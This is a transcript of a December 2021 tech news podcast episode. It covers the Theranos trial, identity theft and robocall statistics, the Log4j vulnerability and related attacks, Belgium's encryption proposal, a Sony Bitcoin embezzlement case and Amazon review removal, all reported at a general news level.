1 00:00:04,400 --> 00:00:07,800 Speaker 1: Welcome to tech Stuff, a production from I Heart Radio. 2 00:00:12,039 --> 00:00:14,600 Speaker 1: Hey there, and welcome to tech Stuff. I'm your host, 3 00:00:14,720 --> 00:00:17,600 Speaker 1: Jonathan Strickland. I'm an executive producer with I Heart Radio 4 00:00:17,640 --> 00:00:20,079 Speaker 1: and a lot of all things tech. And this is 5 00:00:20,120 --> 00:00:24,759 Speaker 1: the tech news for Tuesday, December twenty one, twenty twenty one. 6 00:00:25,360 --> 00:00:28,120 Speaker 1: Before we get into it, the rest of the episodes 7 00:00:28,200 --> 00:00:30,400 Speaker 1: this week will be classic episodes in order for us 8 00:00:30,440 --> 00:00:33,280 Speaker 1: to take some time off for the holidays. I hope 9 00:00:33,280 --> 00:00:36,080 Speaker 1: you guys enjoy that we will have a couple of 10 00:00:36,080 --> 00:00:39,000 Speaker 1: new episodes next week. My hope is to have some 11 00:00:39,040 --> 00:00:42,080 Speaker 1: episodes that are the wrap up for the year in 12 00:00:42,159 --> 00:00:45,360 Speaker 1: tech one. Those are gonna be some doozies. I'm sure 13 00:00:45,400 --> 00:00:47,000 Speaker 1: it's gonna be more than one episode, but I have 14 00:00:47,080 --> 00:00:50,880 Speaker 1: not actually written them yet, so we'll see. But let's 15 00:00:50,880 --> 00:00:55,000 Speaker 1: get to the news for today. The trial of Elizabeth Holmes, 16 00:00:55,120 --> 00:00:58,160 Speaker 1: the founder of the company Theronos, is now in the 17 00:00:58,200 --> 00:01:01,120 Speaker 1: hands of the jury. They will meet for a second 18 00:01:01,160 --> 00:01:04,280 Speaker 1: day of deliberations today to determine a verdict for Holmes, 19 00:01:04,319 --> 00:01:08,120 Speaker 1: who is facing eleven charges of wire fraud and conspiracy 20 00:01:08,200 --> 00:01:12,080 Speaker 1: to commit wire fraud. Now, in case you managed to 21 00:01:12,160 --> 00:01:15,560 Speaker 1: miss out on the Tharonis story. Over the last decade, 22 00:01:16,280 --> 00:01:19,520 Speaker 1: Holmes founded a medical startup company with the goal of 23 00:01:19,560 --> 00:01:23,080 Speaker 1: producing a device that could run a battery of tests 24 00:01:23,120 --> 00:01:27,000 Speaker 1: on a single micro drop of blood. Holmes has said 25 00:01:27,040 --> 00:01:30,120 Speaker 1: that her fear of needles and a desire to democratize 26 00:01:30,200 --> 00:01:34,640 Speaker 1: medicine drove her to found Theoris, and if the deck 27 00:01:34,680 --> 00:01:39,240 Speaker 1: had worked, it could have truly revolutionized medicine, potentially to 28 00:01:39,280 --> 00:01:42,840 Speaker 1: the point where a household would have its own Theoris device, 29 00:01:42,840 --> 00:01:45,480 Speaker 1: almost like a desktop printer, and they could use it 30 00:01:45,520 --> 00:01:48,520 Speaker 1: to run tests and share that information with a physician. 31 00:01:49,440 --> 00:01:52,880 Speaker 1: But unfortunately, as was slowly revealed in a series of 32 00:01:52,920 --> 00:01:57,920 Speaker 1: expose s and documentaries and testimonials, the tech just could 33 00:01:57,920 --> 00:02:00,960 Speaker 1: not live up to that promise. But didn't stop sarin 34 00:02:01,080 --> 00:02:05,680 Speaker 1: Us from raising nearly one billion dollars in investments over 35 00:02:05,720 --> 00:02:08,400 Speaker 1: the years. And that's kind of the nub of the case. 36 00:02:08,960 --> 00:02:14,000 Speaker 1: Did Holmes knowingly misrepresent what her technology could do and 37 00:02:14,280 --> 00:02:19,040 Speaker 1: how it performed in order to get investors and partnerships 38 00:02:19,080 --> 00:02:24,680 Speaker 1: with healthcare companies? Did she intend to mislead them? That's 39 00:02:24,680 --> 00:02:28,040 Speaker 1: what the jury has to determine. She certainly adopted a 40 00:02:28,120 --> 00:02:31,800 Speaker 1: lavish and eccentric lifestyle and there are records of her 41 00:02:31,840 --> 00:02:35,400 Speaker 1: interactions with employees who brought up concerns with her. It 42 00:02:35,520 --> 00:02:38,280 Speaker 1: seemed to indicate that she was not keen on accepting 43 00:02:38,360 --> 00:02:41,600 Speaker 1: the possibility that the whole endeavor was fruitless. But her 44 00:02:41,680 --> 00:02:45,560 Speaker 1: lawyers have argued, essentially that she was just as bought 45 00:02:45,639 --> 00:02:49,280 Speaker 1: in to the hype as her investors were, which would 46 00:02:49,320 --> 00:02:53,359 Speaker 1: mean she did not purposefully lie to anyone. Honestly, it's 47 00:02:53,400 --> 00:02:56,320 Speaker 1: a pretty tough call from a legal standpoint, though, I 48 00:02:56,360 --> 00:02:58,600 Speaker 1: think it goes without saying that what the company did 49 00:02:58,680 --> 00:03:02,000 Speaker 1: was wrong and an enormous amount of money was wasted 50 00:03:02,040 --> 00:03:05,680 Speaker 1: on this. Not only that, but for people who are 51 00:03:05,720 --> 00:03:10,119 Speaker 1: depending upon blood tests to come back from Tharaos, that's 52 00:03:10,120 --> 00:03:13,119 Speaker 1: another matter entirely, right, Like, that's the level of criminality 53 00:03:13,200 --> 00:03:17,240 Speaker 1: that goes beyond just fraud. There are people who you know, 54 00:03:17,280 --> 00:03:20,880 Speaker 1: whose health is at stake here. Anyway, We may have 55 00:03:20,919 --> 00:03:23,680 Speaker 1: a verdict later this week, but as I record this episode, 56 00:03:23,680 --> 00:03:27,200 Speaker 1: we're still in the deliberation phase. And now to transition 57 00:03:27,280 --> 00:03:31,280 Speaker 1: into the cyber crime part of this episode, buckledown, folks, 58 00:03:31,280 --> 00:03:34,120 Speaker 1: there's a lot to cover first up, According to a 59 00:03:34,160 --> 00:03:37,920 Speaker 1: company called Group or eighty Group a I T e. 60 00:03:38,040 --> 00:03:40,440 Speaker 1: I don't know how you say the name, but nearly 61 00:03:40,480 --> 00:03:43,560 Speaker 1: half of all Americans were victims of some form of 62 00:03:43,640 --> 00:03:50,000 Speaker 1: financial identity theft in twenty That is a really crazy statistic. Now, 63 00:03:50,040 --> 00:03:52,280 Speaker 1: if I were being flippant, I would suggest that it's 64 00:03:52,320 --> 00:03:55,080 Speaker 1: the other half of all Americans who stole the identities 65 00:03:55,120 --> 00:03:58,000 Speaker 1: of the first half. So if you're not in one group, 66 00:03:58,040 --> 00:04:01,160 Speaker 1: you're in the other. But that's obviously not true. That's 67 00:04:01,400 --> 00:04:05,520 Speaker 1: just a bad joke. Losses from those incidents amounted to 68 00:04:05,560 --> 00:04:10,160 Speaker 1: more than seven hundred billion dollars, according to this research firm, 69 00:04:10,400 --> 00:04:14,120 Speaker 1: which published its findings in a paper titled US Identity 70 00:04:14,240 --> 00:04:18,440 Speaker 1: Theft The Stark Reality. A big slice of that crime 71 00:04:18,440 --> 00:04:21,560 Speaker 1: pie goes to folks who committed some form of unemployment 72 00:04:21,640 --> 00:04:26,320 Speaker 1: identity theft, using false information to claim unemployment benefits. So, 73 00:04:27,000 --> 00:04:30,880 Speaker 1: just to be clear, the folks who were abusing unemployment 74 00:04:30,880 --> 00:04:33,960 Speaker 1: weren't necessarily people who didn't want to work. That was 75 00:04:34,000 --> 00:04:37,160 Speaker 1: like the common narrative you would hear from certain circles, right, like, 76 00:04:37,760 --> 00:04:41,360 Speaker 1: you can't you can't boost unemployment, it will just encourage 77 00:04:41,360 --> 00:04:43,800 Speaker 1: people not to work. No, it turns out the people 78 00:04:43,839 --> 00:04:47,960 Speaker 1: who were really abusing the system were thieves who are 79 00:04:48,000 --> 00:04:52,720 Speaker 1: victimizing other people and stealing from the system in order 80 00:04:52,800 --> 00:04:58,000 Speaker 1: to fund themselves. They weren't like layabouts, they were actually 81 00:04:58,040 --> 00:05:04,920 Speaker 1: actively victimizing oaks who deserved unemployment benefits. By the way, 82 00:05:04,960 --> 00:05:08,239 Speaker 1: if you're between the ages of thirty five and forty four, well, congratulations, 83 00:05:08,240 --> 00:05:10,960 Speaker 1: you are in the prime target zone for those kinds 84 00:05:10,960 --> 00:05:14,640 Speaker 1: of attacks, because that age group represented the highest percentage 85 00:05:14,880 --> 00:05:18,440 Speaker 1: of consumers who found themselves victimized in twenty twenty. The 86 00:05:18,560 --> 00:05:23,840 Speaker 1: report also found that Kansas, Rhode Island, Illinois, Nevada, and 87 00:05:23,920 --> 00:05:26,799 Speaker 1: Washington were the states with the highest number of identity 88 00:05:26,880 --> 00:05:30,200 Speaker 1: theft reports. Now, when it comes to fraud, the states 89 00:05:30,240 --> 00:05:35,560 Speaker 1: the top that list were Nevada again, Delaware, Florida, Maryland, 90 00:05:35,720 --> 00:05:39,400 Speaker 1: and my home state of Georgia. The number one state, 91 00:05:39,720 --> 00:05:42,160 Speaker 1: as in the state with the highest number of reported 92 00:05:42,640 --> 00:05:47,280 Speaker 1: cyber crimes was Kansas, with one thousand, four hundred eighty 93 00:05:47,320 --> 00:05:52,320 Speaker 1: three reports per one hundred thousand people. The safest state 94 00:05:52,480 --> 00:05:55,760 Speaker 1: was South Dakota, which had just seventy two reports per 95 00:05:55,800 --> 00:06:00,000 Speaker 1: one hundred thousand people. However, we take territories into account, 96 00:06:00,080 --> 00:06:02,880 Speaker 1: the real prize goes to Puerto Rico, which only had 97 00:06:02,880 --> 00:06:07,480 Speaker 1: fifty two reports per one thousand people. But wait, it 98 00:06:07,560 --> 00:06:10,520 Speaker 1: keeps getting worse. The report points out that there have 99 00:06:10,600 --> 00:06:13,800 Speaker 1: been some big data breaches and cases of companies failing 100 00:06:13,800 --> 00:06:16,560 Speaker 1: to secure data over the last year, from a case 101 00:06:16,560 --> 00:06:20,440 Speaker 1: where more than two million records from Microsoft customers was 102 00:06:20,520 --> 00:06:24,479 Speaker 1: found on the web unprotected to the ransomware attack on 103 00:06:24,520 --> 00:06:28,480 Speaker 1: Colonial pipeline that interfered with fuel transportation and distribution earlier 104 00:06:28,520 --> 00:06:33,440 Speaker 1: this year. So yeah, bad news. Meanwhile, there are the 105 00:06:33,560 --> 00:06:37,800 Speaker 1: robo calls, another branch of scams and crimes. T Mobile 106 00:06:37,880 --> 00:06:40,600 Speaker 1: released an end of the year report on scam calls 107 00:06:40,600 --> 00:06:43,479 Speaker 1: and robo calls, saying that the number of calls more 108 00:06:43,520 --> 00:06:48,240 Speaker 1: than doubled over the course of so that in January 109 00:06:48,279 --> 00:06:52,320 Speaker 1: there were around one point one billion scam call attempts 110 00:06:52,360 --> 00:06:56,360 Speaker 1: and in November there were two point five billion, and 111 00:06:56,440 --> 00:06:59,360 Speaker 1: people wonder why I never pick up my phone anymore? 112 00:06:59,720 --> 00:07:02,240 Speaker 1: And way. T Mobile says it already blocked more than 113 00:07:02,279 --> 00:07:06,279 Speaker 1: twenty one billion scam calls this year through its scam 114 00:07:06,400 --> 00:07:10,760 Speaker 1: Shield service. Even so, scammers were able to siphon away 115 00:07:10,880 --> 00:07:15,520 Speaker 1: nearly thirty billion dollars from targets. Now. According to T Mobile, 116 00:07:15,920 --> 00:07:18,239 Speaker 1: more than half of those calls came in the form 117 00:07:18,400 --> 00:07:22,360 Speaker 1: of a scam vehicle warranty message, and I could say 118 00:07:22,400 --> 00:07:25,800 Speaker 1: I've actually received some of those. Uh, the few times 119 00:07:25,800 --> 00:07:28,080 Speaker 1: that a scammer actually bothered to leave a voicemail that 120 00:07:28,240 --> 00:07:31,520 Speaker 1: is because I don't pick up the phone. And you know, 121 00:07:31,560 --> 00:07:34,200 Speaker 1: that's actually pretty rich, because there's no car in my name. 122 00:07:34,360 --> 00:07:36,640 Speaker 1: I don't have a car in my name, so I 123 00:07:36,680 --> 00:07:39,400 Speaker 1: didn't know what I'd be warranteeing in the first place. 124 00:07:40,120 --> 00:07:42,720 Speaker 1: But following up on that are calls that claim to 125 00:07:42,720 --> 00:07:46,320 Speaker 1: be from the Social Security Office, which suggests a focus 126 00:07:46,360 --> 00:07:51,040 Speaker 1: on older targets, and the Federal Communications Commission or FCC, 127 00:07:51,280 --> 00:07:54,840 Speaker 1: has really been going after robocall operations in the United States, 128 00:07:55,280 --> 00:07:58,040 Speaker 1: levying hefty fines for companies found to engage in the 129 00:07:58,040 --> 00:08:02,040 Speaker 1: practice and pushing for tell calm companies to institute systems 130 00:08:02,080 --> 00:08:05,880 Speaker 1: that would eliminate stuff like spoofing. Spoofing is when a 131 00:08:05,960 --> 00:08:08,320 Speaker 1: scammer uses a bit of software to make it seem 132 00:08:08,320 --> 00:08:11,120 Speaker 1: as though the call is coming from a different phone number, 133 00:08:11,920 --> 00:08:14,680 Speaker 1: often one that appears to be local to whatever the 134 00:08:14,720 --> 00:08:17,680 Speaker 1: targets phone number is, in an effort to commence them 135 00:08:17,720 --> 00:08:20,040 Speaker 1: to pick up. Like you're more likely to pick up 136 00:08:20,040 --> 00:08:23,720 Speaker 1: a phone if the phone number looks somewhat familiar. That's 137 00:08:23,760 --> 00:08:27,920 Speaker 1: the thought process. The UK's National Crime Agency and National 138 00:08:27,960 --> 00:08:32,160 Speaker 1: Cyber Crime Unit found a database containing two hundred twenty 139 00:08:32,240 --> 00:08:37,920 Speaker 1: five million stolen login credentials for various services and websites. 140 00:08:38,520 --> 00:08:41,920 Speaker 1: The agencies handed this cash of data over to a 141 00:08:42,000 --> 00:08:46,280 Speaker 1: service called Have I Been Poned? That's a have I 142 00:08:46,480 --> 00:08:50,559 Speaker 1: Been pw in e ed. That service gives folks the 143 00:08:50,679 --> 00:08:55,400 Speaker 1: chance to search their own email information to see if 144 00:08:55,440 --> 00:08:58,000 Speaker 1: any of the accounts that email is part of have 145 00:08:58,240 --> 00:09:02,480 Speaker 1: been compromised in the past, and if their passwords have 146 00:09:02,559 --> 00:09:06,160 Speaker 1: been exposed. And so it's really a way for people 147 00:09:06,200 --> 00:09:10,560 Speaker 1: to to kind of take action and see if their 148 00:09:11,000 --> 00:09:14,000 Speaker 1: loggin credentials are still safe. This is also a good 149 00:09:14,000 --> 00:09:17,120 Speaker 1: time to remind you all that it is important to 150 00:09:17,200 --> 00:09:21,280 Speaker 1: set strong passwords. Do not use the same password for 151 00:09:21,400 --> 00:09:23,400 Speaker 1: multiple accounts. I know you all know this, but I'm 152 00:09:23,440 --> 00:09:26,959 Speaker 1: gonna say it anyway. Also, I find that password vault 153 00:09:26,960 --> 00:09:29,640 Speaker 1: programs really help with this because that way you don't 154 00:09:29,640 --> 00:09:33,000 Speaker 1: have to remember two hundred unique strong passwords. I totally 155 00:09:33,080 --> 00:09:37,960 Speaker 1: get that that's not really feasible. So password vault's a 156 00:09:38,000 --> 00:09:43,600 Speaker 1: good password vault is invaluable. And finally, if a service 157 00:09:43,679 --> 00:09:48,920 Speaker 1: that you subscribe to offers two factor authentication, Definitely activate that, 158 00:09:49,080 --> 00:09:52,040 Speaker 1: choose that option. It will really cut back on the 159 00:09:52,120 --> 00:09:55,880 Speaker 1: chance that someone will compromise one of your accounts. We 160 00:09:55,960 --> 00:09:58,240 Speaker 1: have some more stories to cover in this episode, but 161 00:09:58,280 --> 00:10:08,920 Speaker 1: before we get to that, let's tay a quick break. Okay, 162 00:10:08,960 --> 00:10:12,719 Speaker 1: we're back and we're still talking about cybersecurity. You might 163 00:10:12,800 --> 00:10:15,679 Speaker 1: remember that I did a recent episode in which I 164 00:10:15,720 --> 00:10:20,319 Speaker 1: talked about a zero day vulnerability in apaches logging library 165 00:10:20,360 --> 00:10:25,520 Speaker 1: service log for J. Tons of companies, tons of systems 166 00:10:25,520 --> 00:10:29,640 Speaker 1: and services all rely on log for J, and as 167 00:10:29,679 --> 00:10:33,920 Speaker 1: the name suggests, log for J logs data. It essentially 168 00:10:33,960 --> 00:10:36,880 Speaker 1: is about keeping a record of what's going on within 169 00:10:36,920 --> 00:10:42,480 Speaker 1: a system anyway. This particular vulnerability would allow someone like 170 00:10:42,520 --> 00:10:47,000 Speaker 1: a hacker to gain access to a system running log 171 00:10:47,080 --> 00:10:52,120 Speaker 1: for J and potentially get control where they can execute 172 00:10:52,160 --> 00:10:56,080 Speaker 1: whatever code they want and thus execute code that would 173 00:10:56,080 --> 00:10:59,960 Speaker 1: give them full control of that remote server just by 174 00:11:00,160 --> 00:11:05,040 Speaker 1: you know, using this vulnerability in this logging service. Apache 175 00:11:05,160 --> 00:11:09,400 Speaker 1: issued a patch to fix the vulnerability, but you have 176 00:11:09,480 --> 00:11:12,760 Speaker 1: to install patches right Just because the patches there doesn't 177 00:11:12,840 --> 00:11:17,160 Speaker 1: magically solve the issue and cure all these systems that 178 00:11:17,240 --> 00:11:20,000 Speaker 1: have logged for J on them, you have to actually 179 00:11:20,000 --> 00:11:23,440 Speaker 1: install that patch, and the problem is that not everyone 180 00:11:23,559 --> 00:11:26,680 Speaker 1: is super responsive. Not everyone jumps on that right away. 181 00:11:27,000 --> 00:11:30,679 Speaker 1: Sometimes it's not necessarily the fault of the company, maybe 182 00:11:30,840 --> 00:11:34,720 Speaker 1: that their system is so huge and diverse that rolling 183 00:11:34,720 --> 00:11:37,760 Speaker 1: out a patch actually takes a lot of time. That 184 00:11:37,880 --> 00:11:41,800 Speaker 1: means that while there are technically fixes to this problem, 185 00:11:41,840 --> 00:11:45,760 Speaker 1: not everyone is actually incorporating them, not to the same 186 00:11:45,800 --> 00:11:49,800 Speaker 1: degree in the same speed. So some systems, perhaps tens 187 00:11:49,800 --> 00:11:53,040 Speaker 1: of thousands of them, remain vulnerable, and likely some of 188 00:11:53,040 --> 00:11:56,680 Speaker 1: them will remain vulnerable for years to come. Meanwhile, a 189 00:11:56,720 --> 00:12:01,000 Speaker 1: hacker group called CONTI, known primarily for in someware attacks, 190 00:12:01,280 --> 00:12:04,880 Speaker 1: has developed an attack chain that leverages the log for 191 00:12:05,120 --> 00:12:10,600 Speaker 1: J vulnerability. CONTI is a prolific ransomware hacker gang. They're 192 00:12:10,640 --> 00:12:14,160 Speaker 1: based out of Russia. They're potentially state sponsored or at 193 00:12:14,200 --> 00:12:19,120 Speaker 1: least state sanctioned, meaning the Russian authorities have shown very 194 00:12:19,160 --> 00:12:23,559 Speaker 1: little interest in shutting down this hacker group, and security 195 00:12:23,600 --> 00:12:29,280 Speaker 1: experts at at a dv INTEL say Conte's scale is 196 00:12:29,920 --> 00:12:32,679 Speaker 1: really large, it's a big operation, and that their methods 197 00:12:32,720 --> 00:12:37,320 Speaker 1: are very sophisticated, which makes them particularly dangerous and it 198 00:12:37,360 --> 00:12:39,719 Speaker 1: sounds to me like two, where's is going to be 199 00:12:39,760 --> 00:12:43,960 Speaker 1: another big year of of big ransomware attacks. It really 200 00:12:44,000 --> 00:12:46,840 Speaker 1: drives home that organizations will need to spend a lot 201 00:12:46,880 --> 00:12:50,400 Speaker 1: of time and resources to patch vulnerable systems, which again 202 00:12:50,640 --> 00:12:55,480 Speaker 1: is a process that's laborious and time consuming. So you know, 203 00:12:55,640 --> 00:12:58,960 Speaker 1: it's it's a big mess. It's absolutely critical, and it's 204 00:12:59,000 --> 00:13:03,640 Speaker 1: also not easy to do a fun combination. Over in Belgium, 205 00:13:03,720 --> 00:13:07,760 Speaker 1: the Ministry of Defense recently announced that the department was 206 00:13:07,840 --> 00:13:11,520 Speaker 1: the target of cyber attacks and that yes, the attackers 207 00:13:11,520 --> 00:13:15,640 Speaker 1: exploited that log for J vulnerability I was just talking about. 208 00:13:16,120 --> 00:13:20,119 Speaker 1: According to the department quote, some of the Ministry's activities 209 00:13:20,120 --> 00:13:23,880 Speaker 1: were paralyzed for several days end quote. Now, it sounds 210 00:13:23,920 --> 00:13:28,080 Speaker 1: as though staff detected the attack fairly early on, and 211 00:13:28,120 --> 00:13:31,680 Speaker 1: they were able to sequester the infected systems and thus 212 00:13:31,679 --> 00:13:36,040 Speaker 1: compartmentalize their computer systems so that the ministry could mostly 213 00:13:36,080 --> 00:13:39,920 Speaker 1: continue doing what it does while simultaneously containing the threat 214 00:13:39,960 --> 00:13:43,440 Speaker 1: to the affected systems. Now, as I record this, no 215 00:13:43,440 --> 00:13:46,760 Speaker 1: one has yet to identify the attackers, so we don't 216 00:13:46,760 --> 00:13:51,400 Speaker 1: know who was responsible. It is a pretty scary story, right, 217 00:13:51,920 --> 00:13:58,080 Speaker 1: and countries defense ministry being effectively targeted by hackers. It's 218 00:13:58,080 --> 00:14:00,440 Speaker 1: not out of the ordinary. I mean, we know that 219 00:14:00,520 --> 00:14:03,840 Speaker 1: cyber warfare is raging all the time, we just don't 220 00:14:03,880 --> 00:14:06,880 Speaker 1: necessarily know about it most of the time. But to 221 00:14:06,960 --> 00:14:12,559 Speaker 1: see something like that UH is incredibly sobering because obviously 222 00:14:12,920 --> 00:14:18,840 Speaker 1: you could have hostile countries really disabling the functionality of 223 00:14:19,160 --> 00:14:24,640 Speaker 1: massive and critical infrastructure in other countries. Very scary stuff. 224 00:14:25,200 --> 00:14:28,720 Speaker 1: But while I'm talking about Belgium, I should also mention 225 00:14:28,800 --> 00:14:31,440 Speaker 1: that back in June, the government of Belgium proposed a 226 00:14:31,520 --> 00:14:35,320 Speaker 1: law that would require companies that run encrypted messaging services 227 00:14:35,840 --> 00:14:39,680 Speaker 1: like WhatsApp and Signal to include a tool that would 228 00:14:39,800 --> 00:14:44,120 Speaker 1: decrypt communications upon request by authorities in the course of 229 00:14:44,160 --> 00:14:49,960 Speaker 1: criminal investigations. Of course, doing that would completely invalidate encryption 230 00:14:50,200 --> 00:14:52,320 Speaker 1: in the first place. I mean, the whole point of 231 00:14:52,360 --> 00:14:55,800 Speaker 1: the system is that no one other than the parties 232 00:14:55,880 --> 00:14:59,800 Speaker 1: involved in that communication are able to decrypt the messages, 233 00:14:59,840 --> 00:15:03,240 Speaker 1: not not even the service provider. Like that's that's got 234 00:15:03,240 --> 00:15:06,280 Speaker 1: to be key to an encrypted messaging service, that the 235 00:15:06,280 --> 00:15:10,760 Speaker 1: service itself cannot decrypt the messages. To incorporate a work 236 00:15:10,760 --> 00:15:13,640 Speaker 1: around would negate all of that. It would also require 237 00:15:13,640 --> 00:15:16,400 Speaker 1: an entirely different approach to providing the service, but that's 238 00:15:16,400 --> 00:15:21,200 Speaker 1: another matter anyway. Once the public learned of this this 239 00:15:21,440 --> 00:15:26,040 Speaker 1: part of the law, criticism followed. Many rightly pointed out 240 00:15:26,560 --> 00:15:29,600 Speaker 1: that creating a back door in a secure system means 241 00:15:29,680 --> 00:15:33,800 Speaker 1: that you've just removed any security from that system. A backdoor, 242 00:15:34,120 --> 00:15:37,520 Speaker 1: when you really break it down, is a vulnerability, and 243 00:15:37,640 --> 00:15:41,960 Speaker 1: people can learn about and exploit vulnerabilities. So generally speaking, 244 00:15:42,000 --> 00:15:46,720 Speaker 1: you want to identify and eliminate vulnerabilities, not introduce new ones. 245 00:15:47,040 --> 00:15:50,000 Speaker 1: What analogy I was used is that you can have 246 00:15:50,120 --> 00:15:51,880 Speaker 1: like a bank vault and you have like one of 247 00:15:51,920 --> 00:15:56,720 Speaker 1: those big, massive vault doors that totally locks in place 248 00:15:56,760 --> 00:15:58,880 Speaker 1: and has time locks and all this stuff, and it's 249 00:15:58,960 --> 00:16:01,240 Speaker 1: really hard to break through. But if you install a 250 00:16:01,280 --> 00:16:02,880 Speaker 1: screen door in the back of the vault so that 251 00:16:02,960 --> 00:16:05,040 Speaker 1: you could just you know, come in and out more easily, 252 00:16:05,120 --> 00:16:08,480 Speaker 1: then you've just invalidated that that giant door. Right, it 253 00:16:08,520 --> 00:16:11,640 Speaker 1: doesn't matter, same sort of thing when we talk about 254 00:16:11,720 --> 00:16:16,600 Speaker 1: back doors and secure systems. It is a terrible idea. Fortunately, 255 00:16:16,680 --> 00:16:20,120 Speaker 1: the Belgian government listened to the criticism and has subsequently 256 00:16:20,160 --> 00:16:24,640 Speaker 1: removed the decryption requirement from that law. Now it's time 257 00:16:24,640 --> 00:16:29,320 Speaker 1: for a couple of Bitcoin stories. Bitcoin the choice for 258 00:16:29,520 --> 00:16:33,880 Speaker 1: money launderers around the world. So an employee of Sony's 259 00:16:33,920 --> 00:16:38,000 Speaker 1: life insurance company allegedly embezzled around a hundred fifty four 260 00:16:38,040 --> 00:16:44,200 Speaker 1: million dollars during a financial transfer transaction between two Sony 261 00:16:44,320 --> 00:16:48,920 Speaker 1: company accounts. So essentially the job was to move money 262 00:16:48,960 --> 00:16:52,400 Speaker 1: from one Sony account to another Sony account. It's just 263 00:16:52,480 --> 00:16:55,760 Speaker 1: that along the way, a measly hundred fifty four million 264 00:16:55,800 --> 00:17:00,680 Speaker 1: dollars worth of Sony's resources found their way into the 265 00:17:00,760 --> 00:17:04,959 Speaker 1: personal account of this particular Sony employee. That is a 266 00:17:05,040 --> 00:17:09,320 Speaker 1: heck of a dip into the corporate piggy bank. Then 267 00:17:09,320 --> 00:17:13,160 Speaker 1: that employee allegedly converted all of that money into bitcoin, 268 00:17:13,920 --> 00:17:17,679 Speaker 1: around three thousand, eight hundred seventy nine bitcoin, and the 269 00:17:17,800 --> 00:17:21,840 Speaker 1: FBI got on the case and seized the bitcoin in question. 270 00:17:22,040 --> 00:17:26,560 Speaker 1: And today that bitcoin amount is worth around a hundred 271 00:17:26,680 --> 00:17:30,879 Speaker 1: eighty million dollars. That's not not bad amount of interest, 272 00:17:30,960 --> 00:17:33,119 Speaker 1: right It started off with a hundred fifty four million, 273 00:17:33,160 --> 00:17:36,720 Speaker 1: Now you're at a hundred eighty million, like cow. So 274 00:17:37,000 --> 00:17:41,800 Speaker 1: the Sony employee, now former employee, is under arrest in Japan. 275 00:17:42,040 --> 00:17:45,600 Speaker 1: No big surprise there. I'm not sure if this means 276 00:17:45,720 --> 00:17:48,199 Speaker 1: Sony will actually end up with more money than what 277 00:17:48,359 --> 00:17:51,399 Speaker 1: was stolen from it, thanks to the appreciation and value 278 00:17:51,400 --> 00:17:54,600 Speaker 1: of bitcoin between May, when the theft happened and when 279 00:17:54,600 --> 00:17:57,280 Speaker 1: the FBI was able to seize the bitcoin. That's a 280 00:17:57,359 --> 00:18:01,960 Speaker 1: question I can't answer. Pretty curious stuff, But yeah, bitcoin 281 00:18:02,200 --> 00:18:05,800 Speaker 1: continues to be associated with people who are doing some 282 00:18:05,840 --> 00:18:09,000 Speaker 1: pretty shady stuff. Again, like I've said, with a lot 283 00:18:09,040 --> 00:18:12,680 Speaker 1: of other technologies, there's nothing about bitcoin that inherently makes 284 00:18:12,680 --> 00:18:17,000 Speaker 1: it bad. It's just that a lot of bitcoins features 285 00:18:17,119 --> 00:18:20,520 Speaker 1: are ones that also become really useful if you want 286 00:18:20,560 --> 00:18:24,520 Speaker 1: to do shady things, So the tool itself not necessarily bad, 287 00:18:24,560 --> 00:18:30,400 Speaker 1: although I have other very obvious feelings about bitcoin. But yeah, 288 00:18:30,800 --> 00:18:35,240 Speaker 1: you see a lot of folks running some unethical operations 289 00:18:35,400 --> 00:18:39,439 Speaker 1: relying on bitcoin. Speaking of bitcoin, and a report that 290 00:18:39,520 --> 00:18:42,960 Speaker 1: probably didn't surprise that many people, the Wall Street Journal 291 00:18:43,080 --> 00:18:46,439 Speaker 1: says that the top ten thousand bitcoin accounts hold five 292 00:18:46,640 --> 00:18:50,840 Speaker 1: million bitcoins. That's equal to more than two hundred thirty 293 00:18:50,880 --> 00:18:54,919 Speaker 1: billion dollars. That would be about ten thousand out of 294 00:18:54,960 --> 00:18:58,680 Speaker 1: around a hundred fourteen million people, and the Wall Street 295 00:18:58,760 --> 00:19:03,240 Speaker 1: Journal points out this means the top point zero one 296 00:19:03,400 --> 00:19:09,080 Speaker 1: percent of bitcoin holders control nearly of all bitcoin in circulation, 297 00:19:09,600 --> 00:19:12,040 Speaker 1: so this would be the tippy tippy top of a 298 00:19:12,119 --> 00:19:15,720 Speaker 1: pyramid if you were to compare bitcoin to a pyramid scheme. 299 00:19:16,400 --> 00:19:18,399 Speaker 1: Some folks have tried to do that, although I think 300 00:19:19,000 --> 00:19:21,840 Speaker 1: it's more of a speculation engine than a pyramid scheme. 301 00:19:22,480 --> 00:19:25,760 Speaker 1: This is a greater disparity than we see in the 302 00:19:25,880 --> 00:19:28,879 Speaker 1: United States in general, where the top one percent of 303 00:19:28,920 --> 00:19:32,440 Speaker 1: the wealthiest people control around a third of all wealth 304 00:19:32,600 --> 00:19:35,720 Speaker 1: in the US. But one percent is a whole lot 305 00:19:35,760 --> 00:19:40,080 Speaker 1: more than point zero one. Anyway, in the crypto community, 306 00:19:40,119 --> 00:19:42,760 Speaker 1: the accounts that control a lot of bitcoin are referred 307 00:19:42,760 --> 00:19:45,720 Speaker 1: to as whales, and I'm not sure if the researchers 308 00:19:45,720 --> 00:19:49,119 Speaker 1: who looked into this differentiated between accounts that belong to, say, 309 00:19:49,400 --> 00:19:53,960 Speaker 1: a single individual, and those that belong to crypto pools 310 00:19:54,080 --> 00:19:58,159 Speaker 1: or exchanges and that kind of thing. Moving on, let's 311 00:19:58,200 --> 00:20:00,960 Speaker 1: talk about Amazon on because there are a couple of 312 00:20:01,000 --> 00:20:05,280 Speaker 1: big stories. They're One is that Reuter's reports that Amazon 313 00:20:05,400 --> 00:20:10,439 Speaker 1: scrubbed negative reviews of Chi Jinping's book The Governance of China. 314 00:20:10,600 --> 00:20:15,920 Speaker 1: Chi Jinping is the president of China. Now, apparently Amazon 315 00:20:16,080 --> 00:20:19,240 Speaker 1: was told to strike any review that wasn't five stars 316 00:20:19,400 --> 00:20:22,879 Speaker 1: from its Chinese operated sites like the sites that operate 317 00:20:22,960 --> 00:20:27,000 Speaker 1: within China, and the company subsequently removed and disabled reviews 318 00:20:27,119 --> 00:20:30,600 Speaker 1: for that book. This happened about two years ago, and 319 00:20:30,640 --> 00:20:33,680 Speaker 1: the report drives home how big tech companies will often 320 00:20:33,840 --> 00:20:38,320 Speaker 1: enable authoritarian regimes if it means getting access to their 321 00:20:38,680 --> 00:20:42,400 Speaker 1: very huge markets. China has more than one point four 322 00:20:42,720 --> 00:20:46,720 Speaker 1: billion people in it, and so big companies naturally really 323 00:20:46,720 --> 00:20:50,000 Speaker 1: want access to the money those people may or may 324 00:20:50,040 --> 00:20:52,600 Speaker 1: not 